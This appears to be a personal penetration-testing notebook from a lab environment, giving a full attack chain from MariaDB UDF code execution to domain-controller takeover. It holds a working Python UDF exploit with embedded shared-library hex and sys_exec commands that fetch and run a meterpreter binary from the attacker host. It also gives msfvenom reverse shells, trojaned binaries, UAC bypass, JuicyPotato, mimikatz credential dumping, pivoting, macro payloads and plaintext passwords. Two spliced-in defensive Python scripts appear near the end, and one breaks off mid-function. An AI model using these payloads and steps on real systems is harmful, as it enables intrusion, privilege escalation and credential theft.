-mariaDB-
> SHOW Grants;
> select @@hostname, @@tmpdir, @@version, @@version_compile_machine, @@plugin_dir;
> show variables;
> system clear;
**** mariadb exploit ****
Built an automated version, but this is the manual way
1. Build the module
Using the information above, compile the source file matching the OS and DB to create the .so module.
$ git clone https://github.com/mysqludf/lib_mysqludf_sys.git (download the UDF module; UDF = user defined function)
$ cd lib_mysqludf_sys/
$ sudo apt install default-libmysqld-dev (install dependencies)
$ rm lib_mysqludf_sys.so
$ cat Makefile (the relevant part says mysql, so change it)
LIBDIR=/usr/lib
Install:
gcc -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/ -I/usr/include/mariadb/server/private -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
$ make
$ xxd -p lib_mysqludf_sys.so | tr -d '\n' > lib_mysqludf_sys.so.hex (convert it to a hex file)
$ cat lib_mysqludf_sys.so.hex | xclip -selection clipboard
-mariadb-
> set @shell =0x.......; / build the 64-bit shellcode
> select @@plugin_dir;
> select binary @shell into dumpfile '/home/dev/plugin/udf_sys_exec.so';
ERROR 1045 (28000): Access denied for user 'wp'@'%' (using password: YES)
Failed for lack of privileges > need to take root and get into the DB as root.
After stealing the root mysql password as root
$ mysql --host=127.0.0.1 --port=13306 --user=root -p
> set @shell =0x.......;
> select @@plugin_dir;
> select binary @shell into dumpfile '/home/dev/plugin/udf_sys_exec.so';
> create function sys_exec returns int soname 'udf_sys_exec.so';
> select * from mysql.func where name='sys_exec';
After opening python3 -m http.server 80 on kali
> select sys_exec('wget http://192.168.119.160');
Using a reverse shell
> select sys_exec('wget http://192.168.119.160/shell.elf');
> select sys_exec('chmod +x ./shell.elf');
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 192.168.119.160; set LPORT 443; exploit"
> select sys_exec('./shell.elf');
meterpreter: MySQL DB compromised through mysql, success!
Extra : select sys_exec('cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh')
whoami
cat /etc/issue
env
ps aux
netstat -plupn
cat /etc/fstab > check IPs / check IDs and passwords
ssh -V
ssh-keygen
-kali-
$ cat .ssh/authorized_keys update!
paste below the from="10.11.1.250",comm.... line
from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDI9XihwZNm0rycJHUqX8iIpNMwsISlqXWDT35yHIO2FJy8wL1umBasD1/BRRymzoEpFI9ywCn6xxLQiivV7Zg0sP5GeZgF5BD43x4Nori7TVipLwseEvdR60iqq+0bF9dPyWyHk+RYR6ObPGyu/znGDFj1N5VM20cf5aHWUVhYvEsv7i0UuZOOylpMgq3v/Uik3778h5C+zjrT2ChKIRViTWHO2V2DOmohapGI8QqZBdxyzEpb9RWAT4Ad5O6vdzLcNpPbAckjCyZ71P1KbGmS7wYhc9jkRy0W0AvMrYOe9WHxd4+JPP4sLkdLs8Yb6NQ7dE= mysql@zora
Compromised machine
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /var/lib/mysql/.ssh/id_rsa OS-94404@192.168.119.160
If a permission error occurs, find the cause of the failure with $ sudo tail -f /var/log/auth.log (permissions, wrong IP, etc.)
On kali $ sudo vi /etc/ssh/sshd_config
Kali
$ sudo vi /etc/proxychains.conf to register the proxy
# proxychains nmap --top-ports=20 -sT -Pn
# proxychains xfreerdp /d:sandbox /u:alex /v:10.5.5.20 +clipboard
d : domain name
u : user name
redirect to clipboard
Procedure after compromising Windows
Check whether antivirus tools are running
The user password must be changed, so check the user list
1. systeminfo
2. netstat -ano
3. net user /domain alex
4. wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows"
5. Go into Services and check which account the program runs as
6. Check whether you have write permission on the program directory
> icacls "C:\Puppet"
On kali
$ mkdir poultry
$ cd poultry
$ cp /usr/share/windows-resources/binaries/whoami.exe .
$ msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.119.160 LPORT=80 -e x86/shikata_ga_nai -i 9 -f raw > met.bin
# sudo shellter
Inside shellter
mode : A
file path : /home/OS-94404/poultry/whoami.exe
stealth mode: N
payload select : C
payload : /home/OS-94404/poultry/met.bin
dll loader? N
Send the above file
$ sudo python3 -m http.server 80
Download it via Explorer on Windows
C:\Users\Alex> move Downloads\whoami.exe C:\Puppet\Current.exe
Create a new meterpreter listener
> background
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.119.160
> set LPORT 80
> set AutoRunScript post/windows/manage/migrate
> exploit
The Windows machine must be rebooted
c:> shutdown /r /t 0
When it reboots it connects automatically (getting a system shell)
meterpreter> shell
> whoami => nt\system shell
> net user poultryadmin password > change the password
Check whether you can get in via RDP as the new user
# proxychains xfreerdp /u:poultryadmin /v:10.5.5.20 +clipboard
-back in meterpreter-
-attempt to list the domain tokens of any logged in users- (usually you do not find many)
meterpreter > use incognito
> list_tokens -u (there may be no additional login info)
> shell
> cd C:\Users\alex\AppData\Roaming\Thunderbird\Profiles\jbv4ndsh.default-release\Mail.sandbox.local\Inbox
(dig through the mail)
- Internal network enumeration -
c:\>for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up!
The gateway address also shows up in the results. Check with ipconfig /all
-Kali-
Port-scan the IPs found above (takes a long time)
$ proxychains nmap --top-ports=1000 -sT -Pn 10.5.5.25,30 --open
Jenkins
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160/whoami.exe', 'c:\Users\Public\whoami.exe');
c:\Users\Public\whoami.exe
$ sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.119.160; set LPORT 80; exploit"
whoami
net user jenkinsuser
Check the current user's privileges : whoami /priv (SeImpersonatePrivilege)
systeminfo
exit
Upload JuicyPotato
meterpreter > upload /home/OS-94404/cvp/juicypotato.exe c:/Users/Public/JuicyPotato.exe
> background
> exploit
In Jenkins
Check the 'Execute concurrent builds if necessary' box
C:\Users\Public\JuicyPotato.exe -t t -p C:\Users\Public\whoami.exe -l 5837
It failed, but because the box was checked the previous job kept running and we got a SYSTEM shell
meterpreter> getuid
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token sandbox\\Administrator
=== Final chapter. Taking over the domain controller ===
> sysinfo
> getuid
> shell
c:> whoami
C:\Windows\system32>net user /domain administrator
1. Find the host name
c:\> nslookup
> set type=all
> _ldap._tcp.dc._msdcs.sandbox.local (check the host name)
> exit
2. Open PowerShell and check whether Invoke-Command can be run
c:> powershell
ps> $dcsesh = New-PSSession -Computer SANDBOXDC (host name found above)
ps> Invoke-Command -Session $dcsesh -ScriptBlock {ipconfig}
3. If it works, copy over the whoami attack code
ps> Copy-Item "C:\Users\Public\whoami.exe" -Destination "C:\Users\Public\" -ToSession $dcsesh
ps> exit
ps> exit
After copying, step out briefly to start a new listener
meterpreter> background
meterpreter> exploit -j
4. Go straight back to the previous session
meterpreter> sessions => go to the SYSTEM session
meterpreter> sessions -i 2
meterpreter> shell
5. Run the copied payload
c:\> powershell
ps:> $dcsesh = New-PSSession -Computer SANDBOXDC
ps> Invoke-Command -Session $dcsesh -ScriptBlock {C:\Users\Public\whoami.exe}
A new session opens
Exit with Ctrl+C, put it in the background, and look through the captured sessions: the last one is the domain controller.
meterpreter> sessions -l
meterpreter> sessions -i 3
meterpreter> sysinfo
meterpreter> getuid
meterpreter> shell
c:> whoami
> hostname
After compromising Linux
1. Check Running Services
$ ps aux
2. System Services
$ systemctl
3. Installed application
$ ls /usr/bin
4. Check running port
$ netstat -tulpn
If nothing special is found, start looking at kernel exploits
mysql UDF python exploit 46249.py
# usage
# Process :
# generate payload > edit code > open python server > open meterpreter > run code
# $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=443 -f elf > shell.elf
# edit the code
# $ sudo python3 -m http.server 80 > the file has to be fetched, so have this ready
# $ sudo msfconsole -q -x "use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp; set LHOST 192.168.119.160; set LPORT 443; exploit"
# running the code then succeeds
# Usage : $ python 46249.py -u root -pBmDu9xUHKe3fZi3Z7RdMBeb
import sys
import subprocess
import platform, random
import argparse
import os
import re
import pty
shellcode_x32 = "7f454c4601010100000000000000000003000300010000007009000034000000581200000000000034002000040028001900180001000000000000000000000000000000f80e0000f80e00000500000000100000010000000010000000100000001000000801000010010000060000000010000002000000141000001410000014100000d0000000d0000000060000000400000051e5746400000000000000000000000000000000000000000600000004000000250000002a0000001400000008000000270000001d0000000000000000000000030000000000000011000000000000000a0000002900000012000000200000000000000000000000260000000c0000002100000017000000230000000d000000000000000e0000001c000000150000000000000006000000000000000000000010000000220000000f0000002400000019000000180000000000000000000000000000000000000000000000000000001a0000000200000013000000050000000000000000000000000000000000000000000000000000001f00000001000000280000000000000000000000000000000000000000000000070000002500000016000000000000000b00000000000000000000000000000000000000000000001e0000001b0000000000000000000000090000000000000000000000040000000000000011000000130000000400000007000000010804409019c7c9bda4080390046083130000001500000016000000180000001a0000001c0000001f00000021000000000000002200000000000000230000002400000026000000280000002900000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe1200000000000000000000000000000000e7000000000000008d00000012000000c2000000000000005c00000012000000ba00000000000000e7040000120000000100000000000000000000002000000025000000000000000000000020000000ed000000000000007e02000012000000ab01000000000000150100001200000079010000000000007d00000012000000c700000000000000c600000012000000f50000000000000071010000120000009e01000000000000fb00000012000000cf00000000000000700000001200000010010000000000002500000012000000e0000000000000008901000012000000b500000000000000a80200001200000016000000000000000b0100002200000088010000000000007400000012000000fb0000000000000
0230000001200000080010000040d00006100000012000b00750000003b0a00000500000012000b0010000000f80d00000000000012000c003f010000a10c00002500000012000b001f010000100900000000000012000900c301000008110000000000001000f1ff96000000470a00000500000012000b0070010000ee0c00001600000012000b00cf01000010110000000000001000f1ff56000000310a00000500000012000b00020100009c0b00003000000012000b00a30100007d0d00003e00000012000b00390000002c0a00000500000012000b00320100006b0c00003600000012000b00bc01000008110000000000001000f1ff65000000360a00000500000012000b0025010000fc0b00006f00000012000b0085000000400a00000700000012000b0017010000cc0b00003000000012000b0055010000c60c00002800000012000b00a90000004c0a00008800000012000b008f010000650d00001800000012000b00d7000000d40a0000c800000012000b00005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3000474c4942435f322e310000000200030003000000000003000300030003000300030003000300030003000400030002000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000300b20100001000000000000000731f690900000400d4010000100000001069690d0000030
";
shellcode_x64 = "";
shellcode = shellcode_x32
if (platform.architecture()[0] == '64bit'):
    shellcode = shellcode_x64
# MySQL username and password: make sure you have FILE privileges and mysql is actually running as root
# username='root'
# password=''
###
#if len(sys.argv) != 2:
#    print "Usage: %s <username> <password>" % argv[0]
#username=sys.argv[1];
#password=sys.argv[2];
###
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='MySQL username', type=str, required=True)
parser.add_argument('--password', '-p', help='MySQL password', type=str)
args = parser.parse_args()
username=args.username
password=args.password
if not password:
    password=''
cmd='mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select @@plugin_dir \G"'
plugin_str = subprocess.check_output(cmd, shell=True)
plugin_dir = re.search('@plugin_dir: (\S*)', plugin_str)
res = bool(plugin_dir)
if not res:
    print "Error: could not locate the plugin directory"
    sys.exit(1)
plugin_dir_ = plugin_dir.group(1)
print "Plugin dir is %s" % plugin_dir_
# path to write the UDF .so file to (hardcoded below instead of using plugin_dir_)
# alternative way:
# set @outputpath := @@plugin_dir;
print "Trying to create a udf library...";
os.system('mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select binary 0x' + shellcode + ' into dumpfile \'/home/dev/plugin/udf_sys_exec.so\'"')
udf_outfile = '/home/dev/plugin/udf_sys_exec.so'
udf_filename = 'udf_sys_exec.so'
print "UDF library created successfully: %s" % udf_outfile;
print "Trying to create sys_exec..."
os.system('mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "create function sys_exec returns int soname \'%s\' \G"' % udf_filename)
print "Checking if sys_exec was created..."
cmd='mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select * from mysql.func where name=\'sys_exec\' \G"'
res = subprocess.check_output(cmd, shell=True)
if (res == ''):
    print "sys_exec was not found (good luck next time!)"
if res:
    print "sys_exec was found: %s" % res
    print "Fetching and running shell.elf through sys_exec..."
    os.system('mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select sys_exec(\'wget http://192.168.119.160/shell.elf\')"')
    os.system('mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select sys_exec(\'chmod +x ./shell.elf\')"')
    os.system('mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select sys_exec(\'./shell.elf\')"')
Post-exploitation steps on Windows
++++ Simple stuff to find interesting info +++++
c:> dir *.dbx /s (Emails)
c:> findstr /si password *.xml *.ini *.txt (Find passwords)
c:> pwdump/mimikatz (hashes, and sometimes cleartext passwords)
c:> netstat -ano (Find other network services on the box, and if another machine on the lab is talking to box you own)
+++ Case 1 +++
https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
1. Check privileges
C:\Windows\system32>whoami /priv
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled > use PsExec.exe
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
2. Build the payload and start a listener
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.160 LPORT=444 --format exe -o reverse.exe
$ sudo nc -lvnp 444
Send over PsExec.exe and the payload ($ sudo python -m SimpleHTTPServer)
c:\Users\Public>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/PsExec.exe', 'c:\Users\Public\Ps.exe')
c:\Users\Public>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/reverse.exe', 'c:\Users\Public\reverse.exe')
3. Run PsExec.exe (confirm that PsExec cannot run at the current privilege level!)
c:\Users\Public>Ps.exe -i -accepteula -d -s reverse.exe
Ps.exe -i -accepteula -d -s reverse.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Couldn't install PSEXESVC service:
Connecting to local system...
This means UAC (User Account Control) is enabled.
4. Re-check UAC
c:\Users\Public>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5 > in theory there are five values, but in practice it is 0, 2 or 5
EnableLUA REG_DWORD 0x1 > 1 means UAC is enabled
PromptOnSecureDesktop REG_DWORD 0x1 > 1 means it is on
Check these three values
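As an added example (not code from the original post), a small Python script that parses the three values from the reg query dump above and says what UAC posture they amount to, so an auditor can tell at a glance whether auto-elevating binaries are exempt from the prompt; the sample output is constructed to match the registry dump shown here.

```python
import re

# Documented meanings of ConsentPromptBehaviorAdmin under
# HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System.
CONSENT_PROMPT_ADMIN = {
    0: "elevate without prompting",
    1: "prompt for credentials on the secure desktop",
    2: "prompt for consent on the secure desktop (Always notify)",
    3: "prompt for credentials",
    4: "prompt for consent",
    5: "prompt for consent for non-Windows binaries only (default)",
}

# Constructed sample: the lines of the 'reg query' dump shown above, with the
# indentation that reg.exe actually prints.
SAMPLE_REG_OUTPUT = """
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    EnableLUA    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
"""

REG_DWORD_LINE = re.compile(r"^\s*(\S+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$")


def parse_reg_query(output):
    """Collect the REG_DWORD name/value pairs from reg query text output."""
    values = {}
    for line in output.splitlines():
        match = REG_DWORD_LINE.match(line)
        if match:
            values[match.group(1)] = int(match.group(2), 16)
    return values


def assess_uac(values):
    """Return (verdict, findings) for the three policy values.

    Keys missing from the dump are treated as the Windows defaults (1, 5, 1).
    """
    findings = []
    enable_lua = values.get("EnableLUA", 1)
    consent = values.get("ConsentPromptBehaviorAdmin", 5)
    secure_desktop = values.get("PromptOnSecureDesktop", 1)

    if enable_lua == 0:
        findings.append("EnableLUA=0: UAC is off, admin logons get a full high-integrity token")
        return "disabled", findings

    findings.append("ConsentPromptBehaviorAdmin=%d: %s"
                    % (consent, CONSENT_PROMPT_ADMIN.get(consent, "undocumented value")))
    if consent == 0:
        return "silent elevation", findings
    if consent == 5:
        # Per Microsoft's documentation this is the only level that exempts Windows
        # binaries marked <autoElevate>true</autoElevate> (the eventvwr.exe check
        # above) from the prompt, so it is the level at which that class of prompt
        # bypass works against an admin user.
        findings.append("autoElevate Windows binaries elevate with no prompt at this level")
        return "auto-elevate exposed", findings
    if secure_desktop == 0:
        findings.append("PromptOnSecureDesktop=0: the prompt is not isolated from other windows")
    return "prompts for every elevation", findings


def check(output):
    """Parse a reg query dump and return its UAC verdict and findings."""
    return assess_uac(parse_reg_query(output))


if __name__ == "__main__":
    verdict, notes = check(SAMPLE_REG_OUTPUT)
    print("UAC posture:", verdict)
    for note in notes:
        print(" -", note)
```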
5. Bypass UAC
Requirements:
- C Exploit (https://github.com/turbo/zero2hero/blob/master/main.c)
- strings64.exe (https://docs.microsoft.com/en-us/sysinternals/downloads/strings)
- eventvwr.exe (built into Windows)
Locate eventvwr.exe
c:\Users\Public>where /r c:\windows eventvwr.exe
where /r c:\windows eventvwr.exe
c:\Windows\System32\eventvwr.exe
c:\Windows\SysWOW64\eventvwr.exe
c:\Windows\WinSxS\amd64_eventviewersettings_31bf3856ad364e35_10.0.14393.0_none_226c43821a65c869\eventvwr.exe
c:\Windows\WinSxS\wow64_eventviewersettings_31bf3856ad364e35_10.0.14393.0_none_2cc0edd44ec68a64\eventvwr.exe
After downloading Strings, check whether eventvwr.exe is marked to auto-elevate to high integrity
c:\Users\Public>strings64.exe -accepteula C:\Windows\System32\eventvwr.exe | findstr /i autoelevate
<autoElevate>true</autoElevate>
Once confirmed, modify part of the exploit:
/*
GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\reverse.exe");
*/
> replace "\\reverse.exe" with the name of our payload and remove the comment markers
Compile with mingw and share it
$ x86_64-w64-mingw32-gcc bypass.c -o eventvwr_bypass_64.exe
c:\Users\Public>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/eventvwr_bypass_64.exe', 'c:\Users\Public\attack.exe')
6. Start the listener, then run the file
After the connection comes back,
type c:> whoami /priv:
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
All the privileges show up.
Both PsExec and Juicy Potato are usable in this situation.
7. PsExec again (SYSTEM shell: c:> psexec.exe -i -s cmd.exe / ps.exe -i -s cmd.exe)
Start another listener and run the command
c:\Users\Public>Ps.exe -i -accepteula -d -s c:\Users\Public\reverse.exe
Ps.exe -i -accepteula -d -s c:\Users\Public\reverse.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Starting c:\Users\Public\reverse.exe on SVCLIENT08...
c:\Users\Public\reverse.exe started on SVCLIENT08 with process ID 172.
Catch it on the listener and confirm: privileges are escalated to SYSTEM.
$ sudo nc -lvnp 444
listening on [any] 444 ...
connect to [192.168.119.160] from (UNKNOWN) [10.11.1.22] 50431
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami && whoami /priv
whoami && whoami /priv
+++ Case 2 +++
Check
C:\windows\system32>whoami /priv
Privilege Name Description State
============================= ==================================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled > use JuicyPotato.exe
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Build the payload and start a listener
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.160 LPORT=443 -f exe > reverse.bat
$ sudo nc -lvnp 443
Send over JuicyPotato.exe and the payload, then run ($ sudo python -m SimpleHTTPServer)
c:> jp.exe -t * -p reverse.bat -l 7997
+++ When another domain exists ++++
winPEASany.exe
mimikatz
> privilege::debug
> sekurlsa::logonpasswords
> lsadump::lsa /patch
> sekurlsa::tickets (extract Kerberos tickets: check the TGS, Ticket Granting Service, tickets)
powerview.ps1 +++ Active Directory Enum +++
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md
PS C:\Users\Public> Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Unrestricted
PS C:\Users\Public> Get-ExecutionPolicy
Get-ExecutionPolicy
Unrestricted
PS C:\Users\Public> Import-Module .\pv.ps1
PS C:\Users\Public>
> Get-NetDomain
> Get-DomainPolicy
> Get-NetDomainController
> Get-NetDomainController -Domain <DomainName>
> Get-NetComputer -FullData
> Get-UserProperty
> Get-UserProperty -Properties pwdlastset
> Get-NetLoggedon
> Get-NetLoggedon -ComputerName SVCLIENT08
> Get-NetSession -ComputerName SV-DC01
> Get-NetGroupMember
Find-LocalAdminAccess -Verbose
Invoke-EnumerateLocalAdmin -Verbose
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth
Invoke-UserHunter -CheckAccess
+++ crowbar +++++++
$ crowbar -b rdp -s 10.11.1.20/32 -U user.txt -C pass.txt -n 1
$ crowbar -b rdp -s 10.11.1.24/32 -U users.txt -c ThisIsTheUsersPassword01 -n 1
PowerShell cheatsheet
https://gist.github.com/m8r0wn/b6654989035af20a1cb777b61fbc29bf
++++++++Pivot+++++++
armitage
pth
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up.
Windows file transfer: powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/
1. Windows = plink.exe (remote port forwarding over SSH)
c:> netstat -anpb TCP
c:> plink.exe -ssh -l kali -pw ilak -R 192.168.119.160:1234:127.0.0.1:49882 192.168.119.160
c:> cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R 10.11.0.4:1234:127.0.0.1:3306 10.11.0.4
=> connects back to Kali.
$ sudo nmap -sS -sV 127.0.0.1 -p 1234
1-1 netsh CMD (TCP 445 of another server on the internal network) ******* smbclient must be able to connect ***********
c:> netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110
c:> netstat -anp TCP | find "4455"
c:> netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow
$ sudo nano /etc/samba/smb.conf => check that min protocol = SMB2
$ sudo /etc/init.d/smbd restart
$ smbclient -L 10.11.1.22 --port=4455 --user=Administrator (check whether any shares exist)
$ sudo mkdir /mnt/win10_share
$ sudo mount -t cifs -o port=4455 //10.11.1.22/Data -o username=Administrator,password=Qwerty09! /mnt/win10_share
$ ls -l /mnt/win10_share/
$ cat /mnt/win10_share/data.txt
Word file payload
Exploiting HTML Applications
Building the payload as a doc file
0. Create the file
msfconsole > use exploit/multi/fileformat/office_word_macro
1. payload
format vba-psh / hta-psh
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.160 LPORT=80 --format hta-psh > shell.hta
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=443 --format vba-psh > shell.doc
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=443 --platform windows --smallest StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 -f c > evil.doc
Example usage:
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = "0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByA"
Str = Str + "HUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACc"
Str = Str + "ASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4Ab"
Str = Str + "wBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB"
Str = Str + "5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQA"
Str = Str + "HIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADs"
Str = Str + "A"
CreateObject("Wscript.Shell").Run Str
End Sub
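An added triage example, not part of the original post: the macro above builds its command out of base64 string chunks, and this Python script rebuilds them, tries each base64 alignment and UTF-16LE byte phase, and reports the readable PowerShell fragment plus the markers a defender would flag. The VBA sample is constructed from the chunks shown above (an extraction fragment, so it does not start on a base64 boundary).

```python
import base64
import re
import string

# Constructed sample: the Str chunks of the macro above, as an analyst would
# paste them out of a macro dump. The first chunk is a fragment, so the base64
# does not start on a 4-character boundary.
SAMPLE_VBA = '''
Sub MyMacro()
Dim Str As String
Str = "0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByA"
Str = Str + "HUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACc"
Str = Str + "ASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4Ab"
Str = Str + "wBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB"
Str = Str + "5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQA"
Str = Str + "HIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADs"
Str = Str + "A"
CreateObject("Wscript.Shell").Run Str
End Sub
'''

STRING_LITERAL = re.compile(r'"([^"]*)"')
ASSIGNS_STR = re.compile(r'^\s*Str\s*=')
PRINTABLE = set(string.printable) - set("\x0b\x0c")

# Things a defender looks for in the recovered command.
MARKERS = {
    "hidden window": "WindowStyle='Hidden'",
    "no console window": "CreateNoWindow=$true",
    "spawns a process": "[System.Diagnostics.Process]::Start",
}


def join_chunks(vba_source):
    """Concatenate every literal assigned to Str, in source order."""
    pieces = []
    for line in vba_source.splitlines():
        if ASSIGNS_STR.match(line):
            pieces.extend(STRING_LITERAL.findall(line))
    return "".join(pieces)


def decode_candidates(blob):
    """Decode a base64 fragment of unknown alignment as UTF-16LE (what
    powershell -EncodedCommand expects) and keep only fully printable results."""
    b64 = re.sub(r"[^A-Za-z0-9+/]", "", blob)
    results = []
    for skip in range(4):                      # unknown base64 alignment
        chunk = b64[skip:]
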